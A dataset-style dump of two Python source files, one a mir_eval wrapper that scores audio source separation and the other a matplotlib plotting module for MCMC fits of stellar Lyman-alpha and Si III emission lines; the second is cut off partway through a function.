content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
import mir_eval
import bss_eval_base
class BSSEvalSources(bss_eval_base.BSSEvalBase):
"""
"""
def __init__(self, true_sources_list, estimated_sources_list, source_labels=None, algorithm_name=None,
do_mono=False, compute_permutation=True):
super(BSSEvalSources, self).__init__(true_sources_list=true_sources_list,
estimated_sources_list=estimated_sources_list,
source_labels=source_labels, do_mono=do_mono,
compute_permutation=compute_permutation)
self._mir_eval_func = mir_eval.separation.bss_eval_sources
def _preprocess_sources(self):
reference, estimated = super(BSSEvalSources, self)._preprocess_sources()
# TODO: Check this - not sure what's going on...
# if self.num_channels != 1:
# reference = np.sum(reference, axis=-1)
# estimated = np.sum(estimated, axis=-1)
mir_eval.separation.validate(reference, estimated)
return reference, estimated
def _populate_scores_dict(self, bss_output):
sdr_list, sir_list, sar_list, perm = bss_output # Unpack
assert len(sdr_list) == len(sir_list) == len(sar_list) == len(self.true_sources_list) * self.num_channels
self.scores[self.RAW_VALUES] = {self.SDR: sdr_list, self.SIR: sir_list, self.SAR: sar_list,
self.PERMUTATION: perm}
idx = 0
for i, label in enumerate(self.source_labels):
self.scores[label] = {}
for ch in range(self.num_channels):
chan = 'Ch {}'.format(ch)
self.scores[label][chan] = {}
self.scores[label][chan][self.SDR] = sdr_list[perm[idx]]
self.scores[label][chan][self.SIR] = sir_list[perm[idx]]
self.scores[label][chan][self.SAR] = sar_list[perm[idx]]
idx += 1
self.scores[self.PERMUTATION] = perm
|
import numpy as np
import matplotlib.pyplot as plt
from lyapy import lyapy
import corner as triangle
from matplotlib.ticker import NullFormatter,MultipleLocator, FormatStrFormatter, MaxNLocator
import time
from astropy.modeling.models import Voigt1D, Lorentz1D, Gaussian1D
from matplotlib import gridspec
plt.ion()
def walkers(sampler_chain, variables, param_order, burnin, subset=False):
ndim = sampler_chain[0, 0, :].size
fig, axes = plt.subplots(ndim, 1, sharex=True, figsize=(8, ndim))
## this is for long chains, to plot only 1000 evenly sampled points
if subset:
toplot = np.array(np.linspace(0,len(sampler_chain[0,:,0])-1,1000), dtype=int)
else:
toplot = np.ones_like(sampler_chain[0,:,0], dtype=bool)
i = 0
for p in param_order:
if variables[p]['vary']:
axes[i].plot(sampler_chain[:, toplot, i].T, color="k", alpha=0.4)
axes[i].yaxis.set_major_locator(MaxNLocator(5))
axes[i].set_ylabel(variables[p]['texname'])
ymin = variables[p]['value']-variables[p]['scale']
ymax = variables[p]['value']+variables[p]['scale']
axes[i].vlines(burnin,ymin,ymax,color='r')
i = i + 1
if subset:
plt.xlabel("Coursely sampled step number")
else:
plt.xlabel("Step number")
#outfile_str = spec_header['STAR'] + descrip + '_walkers.png'
#plt.savefig(outfile_str)
def corner(samples, variables, param_order, quantiles=[0.16,0.5,0.84], truths=None, nbins=20,range=None):
# Make the triangle plot.
variable_names = []
for p in param_order:
if variables[p]['vary']:
variable_names.append(variables[p]['texname'])
ndim = len(variable_names)
fig, axes = plt.subplots(ndim, ndim, figsize=(12.5,9))
triangle.corner(samples, bins=nbins, labels=variable_names,
max_n_ticks=3,plot_contours=True,quantiles=quantiles,fig=fig,
show_titles=True,verbose=True,truths=truths,range=range)
#outfile_str = spec_header['STAR'] + descrip + '_cornerplot.png'
#plt.savefig(outfile_str)
# End triangle plot
def profile(wave_to_fit, flux_to_fit, error_to_fit, resolution,
model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
perform_error=True, Voigt=False, Lorentzian=False, nbins=100, thin_out = 1.0,
fix_stellar_ISM_RV_diff=False):
f = plt.figure(figsize=(8,9))
plt.rc('text', usetex=True)
plt.rc('font', family='sans-serif', size=14)
gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
ax = plt.subplot(gs[0])
axx = plt.subplot(gs[1])
axxx = plt.subplot(gs[2])
if samples is not None:
ndim = len(samples[0])
#print ndim
if perform_error:
array_length = int(len(samples)/thin_out)
model_fits = np.zeros((array_length,len(wave_to_fit)))
intrinsic_profs = np.zeros((array_length,len(wave_to_fit)))
SiIII_profs = np.zeros((array_length,len(wave_to_fit)))
lnprobs = np.zeros(array_length)
#for i, sample in enumerate(samples[np.random.randint(len(samples), size=10)]):
i=-1
for ll, sample in enumerate(samples):
if (ll % thin_out) == 0:
i += 1
theta_all = []
theta = []
j = 0
for p in param_order:
if variables[p]['vary']:
theta_all.append(sample[j])
theta.append(sample[j])
j = j+1
else:
theta_all.append(variables[p]['value'])
if not Voigt:
vs_n_i, am_n_i, fw_n_i, vs_b_i, am_b_i, fw_b_i, h1_col_i, h1_b_i, \
h1_vel_i, d2h_i, vs_haw_i, am_haw_i, fw_haw_i, \
vs_SiIII_i, am_SiIII_i, fw_SiIII_i, ln_f_i = theta_all
singcomp = variables['am_b']['single_comp']
#model_fit = lyapy.damped_lya_profile(wave_to_fit,vs_n_i,10**am_n_i,fw_n_i,
# vs_b_i,10**am_b_i,fw_b_i,h1_col_i,
# h1_b_i,h1_vel_i,d2h_i,resolution,
# single_component_flux=singcomp)/1e14
lya_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_n_i,10**am_n_i,fw_n_i,
vs_b_i,10**am_b_i,fw_b_i,
single_component_flux=singcomp)
if variables['vs_haw']['HAW']:
haw_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_haw_i,
10**am_haw_i,
fw_haw_i,
single_component_flux=True)
lya_intrinsic_profile += haw_profile
intrinsic_profs[i,:] = lya_intrinsic_profile
else:
vs_i, am_i, fw_L_i, fw_G_i, h1_col_i, h1_b_i, h1_vel_i, d2h_i, vs_SiIII_i, am_SiIII_i, fw_SiIII_i,ln_f_i = theta_all
if fix_stellar_ISM_RV_diff:
h1_vel_i = h1_vel_i + vs_i
line_center_i = vs_i/3e5*1215.67+1215.67
sigma_G_i = fw_G_i/3e5 * 1215.67 #/ 2.3548
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
sigma_L_i = fw_G_i * fw_L_i /3e5 * 1215.67 / 2.
else:
sigma_L_i = fw_G_i * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
else:
sigma_L_i = fw_L_i/3e5 * 1215.67 #/ 2.
if Lorentzian:
voigt_profile_func_i = Lorentz1D(x_0 = line_center_i, amplitude = 10**am_i,
fwhm = sigma_L_i)
else:
voigt_profile_func_i = Voigt1D(x_0 = line_center_i, amplitude_L = 10**am_i,
fwhm_L = sigma_L_i, fwhm_G = sigma_G_i)
lya_intrinsic_profile = voigt_profile_func_i(wave_to_fit)
intrinsic_profs[i,:] = np.convolve(lya_intrinsic_profile,resolution,mode='same')
if variables['vs_SiIII']['SiIII']:
if variables['vs']['match_v_HI_SiIII']:
SiIII_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_i,
10**am_SiIII_i,
fw_SiIII_i,
single_component_flux=True, line_center=1206.50)
else:
SiIII_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_SiIII_i,
10**am_SiIII_i,
fw_SiIII_i,
single_component_flux=True, line_center=1206.50)
lya_intrinsic_profile += SiIII_profile
SiIII_profs[i,:] = np.convolve(SiIII_profile,resolution,mode='same')
total_attenuation = lyapy.total_tau_profile_func(wave_to_fit,
h1_col_i,h1_b_i,h1_vel_i,d2h_i)
model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
lya_intrinsic_profile, total_attenuation)/1e14
model_fits[i,:] = model_fit
lnprobs[i] = lyapy.lnprob_voigt(theta,wave_to_fit,flux_to_fit,error_to_fit,variables)
max_lnprob_index = np.where(lnprobs == np.max(lnprobs))
#plt.plot(wave_to_fit,model_fit,'deeppink',linewidth=1., alpha=0.1)
sig2_low = np.zeros_like(wave_to_fit)
sig1_low = np.zeros_like(wave_to_fit)
median = np.zeros_like(wave_to_fit)
sig1_high = np.zeros_like(wave_to_fit)
sig2_high = np.zeros_like(wave_to_fit)
sig2_low_intr_prof = np.zeros_like(wave_to_fit)
sig1_low_intr_prof = np.zeros_like(wave_to_fit)
median_intr_prof = np.zeros_like(wave_to_fit)
sig1_high_intr_prof = np.zeros_like(wave_to_fit)
sig2_high_intr_prof = np.zeros_like(wave_to_fit)
sig2_low_SiIII_prof = np.zeros_like(wave_to_fit)
sig1_low_SiIII_prof = np.zeros_like(wave_to_fit)
median_SiIII_prof = np.zeros_like(wave_to_fit)
sig1_high_SiIII_prof = np.zeros_like(wave_to_fit)
sig2_high_SiIII_prof = np.zeros_like(wave_to_fit)
#sig2_low_intr = np.zeros_like(wave_to_fit)
#sig1_low_intr = np.zeros_like(wave_to_fit)
#median_intr = np.zeros_like(wave_to_fit)
#sig1_high_intr = np.zeros_like(wave_to_fit)
#sig2_high_intr = np.zeros_like(wave_to_fit)
#sig2_low_SiIII = np.zeros_like(wave_to_fit)
#sig1_low_SiIII = np.zeros_like(wave_to_fit)
#median_SiIII = np.zeros_like(wave_to_fit)
#sig1_high_SiIII = np.zeros_like(wave_to_fit)
#sig2_high_SiIII = np.zeros_like(wave_to_fit)
for i in np.arange(len(wave_to_fit)):
sig2_low[i], sig1_low[i], median[i], sig1_high[i], sig2_high[i] = \
np.percentile(model_fits[:,i], [2.5,15.9,50,84.1,97.5])
sig2_low_intr_prof[i], sig1_low_intr_prof[i], median_intr_prof[i], sig1_high_intr_prof[i], sig2_high_intr_prof[i] = \
np.percentile(intrinsic_profs[:,i], [2.5,15.9,50,84.1,97.5])
sig2_low_SiIII_prof[i], sig1_low_SiIII_prof[i], median_SiIII_prof[i], sig1_high_SiIII_prof[i], sig2_high_SiIII_prof[i] = \
np.percentile(SiIII_profs[:,i], [2.5,15.9,50,84.1,97.5])
#low_intr[i], mid_intr[i], high_intr[i] = np.percentile(intrinsic_profs[:,i], [2.5,50,97.5])
#low_SiIII[i], mid_SiIII[i], high_SiIII[i] = np.percentile(SiIII_profs[:,i], [2.5, 50, 97.5])
ax.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
axx.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
ax.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
axx.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
ax.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
axx.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
ax.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
axx.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
reconstructed_flux = np.zeros(len(intrinsic_profs))
SiIII_flux = np.zeros(len(intrinsic_profs))
for i,prof in enumerate(intrinsic_profs):
reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
SiIII_flux[i] = np.trapz(SiIII_profs[i],wave_to_fit)
#plt.histogram
sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr = \
np.percentile(reconstructed_flux, [2.5,15.9,50,84.1,97.5])
sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII = \
np.percentile(SiIII_flux, [2.5,15.9,50,84.1,97.5])
#import pdb; pdb.set_trace()
#for i in range(len(max_lnprob_index[0])):
#ax.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
#axx.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
f2 = plt.figure()
ax2 = f2.add_subplot(1,1,1)
n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
ax2.vlines(sig2_low_intr,0,1.1*np.max(n),color='k',linestyle='--')
ax2.vlines(sig1_low_intr,0,1.1*np.max(n),linestyle='--',color='grey')
#ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
ax2.vlines(sig2_high_intr,0,1.1*np.max(n),color='k',linestyle='--')
ax2.vlines(sig1_high_intr,0,1.1*np.max(n),linestyle='--',color='grey')
ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
ax2.minorticks_on()
best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
#ax2.vlines(np.trapz(intrinsic_profs[max_lnprob_index,:],wave_to_fit),0,1.1*np.max(n),color='orange')
lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
'$^{+' + str(round((sig2_high_intr-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
'}_{-' + str(round((best_fit_flux-sig2_low_intr)/10**lya_intrinsic_flux_exponent,2)) + \
'}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
verticalalignment='top',horizontalalignment='left',
transform=ax2.transAxes,fontsize=12., color='black')
ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
transform=ax2.transAxes,fontsize=12., color='black')
f3 = plt.figure()
ax3 = f3.add_subplot(1,1,1)
n,bins,patches=ax3.hist(SiIII_flux,bins=nbins)
ax3.vlines(sig2_low_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
#ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
ax3.vlines(sig2_high_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
ax3.set_xlabel('Si III flux (erg cm$^{-2}$ s$^{-1}$)')
ax3.minorticks_on()
ax3.set_title(str(sig2_low_SiIII) + ', ' + str(sig1_low_SiIII) + ', ' + str(median_SiIII) + ', ' + str(sig1_high_SiIII) + ', ' + str(sig2_high_SiIII))
#best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
#ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
#lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
#lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
#ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
# '$^{+' + str(round((high_flux-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
# '}_{-' + str(round((best_fit_flux-low_flux)/10**lya_intrinsic_flux_exponent,2)) + \
# '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax2.transAxes,fontsize=12., color='black')
#ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
# transform=ax2.transAxes,fontsize=12., color='black')
ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
mask=[]
for i in range(len(wave_to_fit)):
if (i%5 == 0):
mask.append(i)
#short_wave = np.linspace(wave_to_fit[0],wave_to_fit[-1],25)
#error_bars_short = np.interp(short_wave,wave_to_fit,error_to_fit)
#short_flux = np.interp(short_wave,wave_to_fit,flux_to_fit)
short_wave = wave_to_fit[mask]
error_bars_short = error_to_fit[mask]
short_flux = flux_to_fit[mask]
ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
#plot the intrinsic profile + components
if not Voigt:
narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_n']['best'][0],
10**variables['am_n']['best'][0],
variables['fw_n']['best'][0],
single_component_flux=True)
if not variables['am_b']['single_comp']:
broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_b']['best'][0],
10**variables['am_b']['best'][0],
variables['fw_b']['best'][0],
single_component_flux=True)
lya_intrinsic_profile_bestfit = narrow_component + broad_component
else:
lya_intrinsic_profile_bestfit = narrow_component
if variables['vs_haw']['HAW']:
haw_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_haw']['best'][0],
10**variables['am_haw']['best'][0],
variables['fw_haw']['best'][0],
single_component_flux=True)
lya_intrinsic_profile_bestfit += haw_component
narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
if not variables['am_b']['single_comp']:
broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
if variables['vs_haw']['HAW']:
haw_component_convolved = np.convolve(haw_component,resolution,mode='same')
ax.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
axx.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
else:
line_center_mle = variables['vs']['mle_best']/3e5*1215.67+1215.67
sigma_G_mle = variables['fw_G']['mle_best']/3e5 * 1215.67 #/ 2.3548
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_L']['mle_best'] /3e5 * 1215.67 / 2.
else:
sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
else:
sigma_L_mle = variables['fw_L']['mle_best']/3e5 * 1215.67 #/ 2.
if Lorentzian:
voigt_profile_func_mle = Lorentz1D(x_0 = line_center_mle, amplitude = 10**variables['am']['mle_best'],
fwhm = sigma_L_mle)
else:
voigt_profile_func_mle = Voigt1D(x_0 = line_center_mle, amplitude_L = 10**variables['am']['mle_best'],
fwhm_L = sigma_L_mle, fwhm_G = sigma_G_mle)
lya_intrinsic_profile_bestfit = voigt_profile_func_mle(wave_to_fit)
try:
if variables['vs_SiIII']['SiIII']:
if variables['vs']['match_v_HI_SiIII']:
SiIII_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs']['mle_best'],
10**variables['am_SiIII']['mle_best'],
variables['fw_SiIII']['mle_best'],
single_component_flux=True, line_center=1206.50)
else:
SiIII_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_SiIII']['mle_best'],
10**variables['am_SiIII']['mle_best'],
variables['fw_SiIII']['mle_best'],
single_component_flux=True, line_center=1206.50)
except:
pass
lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
try:
if variables['vs_SiIII']['SiIII']:
SiIII_component_convolved = np.convolve(SiIII_component,resolution,mode='same')
ax.plot(wave_to_fit,SiIII_component_convolved,'k:',linewidth=0.7)
axx.plot(wave_to_fit,SiIII_component_convolved,'k:',linewidth=0.7)
except:
pass
#
# ax.step(wave_to_fit[mask],flux_to_fit[mask],'lightblue',linewidth=0.8) ## plotting "masked" region
ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
ax.minorticks_on()
axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
axx.minorticks_on()
ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
plt.ticklabel_format(useOffset=False)
residuals = (flux_to_fit - model_best_fit) / error_to_fit
chi2 = np.sum( residuals**2 )
dof = len(flux_to_fit) - ndim - 1
axxx.plot(wave_to_fit,residuals,'ko')
axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
axxx.set_ylabel('Residuals',fontsize=14)
axxx.minorticks_on()
axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
if perform_error:
LyA_intr_fluxes = np.transpose(np.array([sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr]))
LyA_bestfit_models = np.transpose(np.array([sig2_low, sig1_low, median, sig1_high, sig2_high]))
SiIII_fluxes = np.transpose([sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII])
LyA_intr_profiles = np.transpose(np.array([sig2_low_intr_prof, sig1_low_intr_prof, median_intr_prof, sig1_high_intr_prof, sig2_high_intr_prof]))
SiIII_profiles = np.transpose(np.array([sig2_low_SiIII_prof, sig1_low_SiIII_prof, median_SiIII_prof, sig1_high_SiIII_prof, sig2_high_SiIII_prof]))
return LyA_intr_fluxes, LyA_bestfit_models, SiIII_fluxes, LyA_intr_profiles, SiIII_profiles
# am_n_mcmc_float_str = "{0:.2g}".format(10**am_n_mcmc[0])
# base, exponent = am_n_mcmc_float_str.split("e")
# am_n_exponent = float('1e'+exponent)
# # Inserting text
# ax.text(0.03,0.97,'V$_n$ = ' + str(round(vs_n_mcmc[0],1)) + '$^{+' + str(round(vs_n_mcmc[1],1)) + '}_{-' + str(round(vs_n_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,
# fontsize=12., color='black')
# am_n_p = (10**(am_n_mcmc[0] + am_n_mcmc[1])-10**am_n_mcmc[0])/am_n_exponent
# am_n_m = (10**am_n_mcmc[0]-10**(am_n_mcmc[0] - am_n_mcmc[2]))/am_n_exponent
# ax.text(0.03,0.91,'A$_n$ = ('+ str(round(10**am_n_mcmc[0]/am_n_exponent,1)) + '$^{+' + str(round(am_n_p,1)) + '}_{-' + str(round(am_n_m,1)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(exponent) + '}$',
#verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
#
# ax.text(0.03,0.85,'FW$_n$ = '+ str(round(fw_n_mcmc[0],1)) + '$^{+' + str(round(fw_n_mcmc[1],1)) + '}_{-' + str(round(fw_n_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.79,'V$_b$ = '+ str(round(vs_b_mcmc[0],1)) + '$^{+' + str(round(vs_b_mcmc[1],1)) + '}_{-' + str(round(vs_b_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
#
# am_b_p = (10**(am_b_mcmc[0] + am_b_mcmc[1])-10**am_b_mcmc[0])/am_n_exponent
# am_b_m = (10**am_b_mcmc[0]-10**(am_b_mcmc[0] - am_b_mcmc[2]))/am_n_exponent
# ax.text(0.03,0.73,'A$_b$ = ('+ str(round(10**am_b_mcmc[0]/am_n_exponent,2)) + '$^{+' + str(round(am_b_p,2)) + '}_{-' + str(round(am_b_m,2)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(exponent) + '}$',
#verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
# ax.text(0.03,0.67,'FW$_b$ = '+ str(round(fw_b_mcmc[0],1)) + '$^{+' + str(round(fw_b_mcmc[1],0)) + '}_{-' + str(round(fw_b_mcmc[2],0)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.61,'log N(HI) = '+ str(round(h1_col_mcmc[0],2)) + '$^{+' + str(round(h1_col_mcmc[1],2)) + '}_{-' + str(round(h1_col_mcmc[2],2)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.03,0.55,'b = '+ str(round(h1_b_mcmc[0],1)) + '$^{+' + str(round(h1_b_mcmc[1],1)) + '}_{-' + str(round(h1_b_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.49,'V$_{HI}$ = '+ str(round(h1_vel_mcmc[0],1)) + '$^{+' + str(round(h1_vel_mcmc[1],1)) + '}_{-' + str(round(h1_vel_mcmc[2],1)) + '}$',verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.03,0.43,r'D/H = 1.5$\times$10$^{-5}$',verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
#
# lya_intrinsic_flux_argument = float(("%e" % lya_intrinsic_flux_mcmc).split('e')[0])
# lya_intrinsic_flux_exponent = float(("%e" % lya_intrinsic_flux_mcmc).split('e')[1])
# ax.text(0.65,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + '$^{+' + str(round(lya_intrinsic_flux_max_error/10**lya_intrinsic_flux_exponent,2)) + '}_{-' + str(round(lya_intrinsic_flux_min_error/10**lya_intrinsic_flux_exponent,2)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.97,0.93,r'erg s$^{-1}$ cm$^{-2}$',verticalalignment='top',horizontalalignment='right',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.97,0.88,r'$\chi^{2}_{\nu}$ = ' + str(round(chi2_mcmc/dof_mcmc,1)),verticalalignment='top',horizontalalignment='right',
# transform=ax.transAxes,fontsize=12., color='black')
#
# outfile_str = spec_header['STAR'] + descrip + '_bestfit.png'
# plt.savefig(outfile_str)
def profile_cii(wave_to_fit, flux_to_fit, error_to_fit, resolution,
model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
perform_error=True, nbins=100):
f = plt.figure(figsize=(8,9))
plt.rc('text', usetex=True)
plt.rc('font', family='sans-serif', size=14)
gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
ax = plt.subplot(gs[0])
axx = plt.subplot(gs[1])
axxx = plt.subplot(gs[2])
if samples is not None:
ndim = len(samples[0])
#print ndim
if perform_error:
model_fits = np.zeros((len(samples),len(wave_to_fit)))
intrinsic_profs = np.zeros((len(samples),len(wave_to_fit)))
#for i, sample in enumerate(samples[np.random.randint(len(samples), size=10)]):
for i, sample in enumerate(samples):
theta_all = []
j = 0
for p in param_order:
if variables[p]['vary']:
theta_all.append(sample[j])
j = j+1
else:
theta_all.append(variables[p]['value'])
vs_i, am_i, fw_i, h1_col_i, h1_b_i, h1_vel_i = theta_all
lya_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_i,10**am_i,fw_i,
single_component_flux=True,line_center=1334.532)
other_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
vs_i,2.*(10**am_i),fw_i,
single_component_flux=True,line_center=1335.708)
lya_intrinsic_profile += other_intrinsic_profile
intrinsic_profs[i,:] = lya_intrinsic_profile
total_attenuation = lyapy.total_tau_profile_func_cii(wave_to_fit,
h1_col_i,h1_b_i,h1_vel_i)
model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
lya_intrinsic_profile, total_attenuation)/1e14
model_fits[i,:] = model_fit
#plt.plot(wave_to_fit,model_fit,'deeppink',linewidth=1., alpha=0.1)
low = np.zeros_like(wave_to_fit)
mid = np.zeros_like(wave_to_fit)
high = np.zeros_like(wave_to_fit)
low_intr = np.zeros_like(wave_to_fit)
mid_intr = np.zeros_like(wave_to_fit)
high_intr = np.zeros_like(wave_to_fit)
for i in np.arange(len(wave_to_fit)):
low[i], mid[i], high[i] = np.percentile(model_fits[:,i], [2.5,50,97.5])
low_intr[i], mid_intr[i], high_intr[i] = np.percentile(intrinsic_profs[:,i], [2.5,50,97.5])
ax.fill_between(wave_to_fit, low, high, color='grey')
axx.fill_between(wave_to_fit, low, high, color='grey')
reconstructed_flux = np.zeros(len(intrinsic_profs))
for i,prof in enumerate(intrinsic_profs):
reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
#plt.histogram
low_flux,mid_flux, high_flux = np.percentile(reconstructed_flux, [2.5,50,97.5])
f2 = plt.figure()
ax2 = f2.add_subplot(1,1,1)
n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
ax2.vlines(low_flux,0,1.1*np.max(n),color='k',linestyle='--')
#ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
ax2.vlines(high_flux,0,1.1*np.max(n),color='k',linestyle='--')
ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
ax2.minorticks_on()
best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
